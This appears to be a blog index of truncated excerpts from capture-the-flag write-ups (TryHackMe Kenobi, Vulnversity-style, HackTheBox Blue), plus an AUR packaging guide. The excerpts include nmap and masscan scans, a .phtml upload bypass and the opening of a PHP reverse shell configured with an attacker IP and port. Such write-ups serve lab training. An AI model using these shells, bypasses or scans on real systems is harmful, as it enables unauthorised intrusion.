brkb4mk

[Task 1] Deploy the vulnerable machine Setup bash evironment variable export IP=KENOBI-IP NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP. Make sure there is a connection to the THM network ping $IP -c 3 PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data. 64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms 64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms 64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms --- KENOBI-IP ping statis...

Prerequisite $ export IP=THM_VPN_IP TASK 1 - RECON 1. Scan the machine The command below kicks off the nmap scan into a portScan dir output = all formats. $ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP Nmap scan report for 10.10.0.135 Host is up, received echo-reply ttl 127 (0.050s latency). Scanned at 2020-04-12 12:48:35 BST for 137s Not shown: 991 closed ports Reason: 991 resets PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 127 Mi...

This post will mainly focuses on Task 5 - Privilege Escalation. To start Task 5, we need to ensure the end of Task 4 was complete correctly, therefore, upload the suggested exploit with an extension of .phtml for example pe.phtml to the server via the upload page (http://<ip>:3333/internal); below is the source-code of the exploit. <?php set_time_limit (0); $VERSION = "1.0"; $ip = 'IP ON TRYHACKME NETWORK (tun0)'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400;...

Box Details OS DIFFICULTY POINTS Windows EASY 20 ENUMERATION Inital Port Scanning masscan COMMAND masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue RESULT # Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019 # Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.10.10.5 () Ports: 80/open/tcp//// Host: 10.10.10.5 () Ports: 21/open/tcp//// # Masscan done at Tue Sep 10 14:12:36 2019 nmap Ports for nmap scanning: 80 21...

Box Details OS DIFFICULTY POINTS Windows EASY 20 ENUMERATION Inital Port Scanning masscan To speed things up I am going to run masscan to get the inital port avaliability. COMMAND masscan -p1-65535,U:1-65535 10.10.10.40 --rate=1000 -e tun0 -oG masscan-Blue RESULT # Masscan 1.0.5 scan initiated Sun Sep 8 08:11:45 2019 # Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.10.10.40 () Ports: 135/open/tcp//// Host: 10.10.10.40 () Ports: 49154/open/tcp///...

Flag the Current AUR Package as out-of-date Login to the AUR website and flag the current package as out-of-date to ensure everyone is aware of the package status. Download the Latest Version of the PKGBUILD File As an example when using the yay AUR helper, execute the following command to download the latest version of the PKGBUILD file. $ yay -G NAMEOFPKG Update the Relevant Elements of the PKGBUILD File For example update the version number via the pkgver variable. Generate All CHECKS...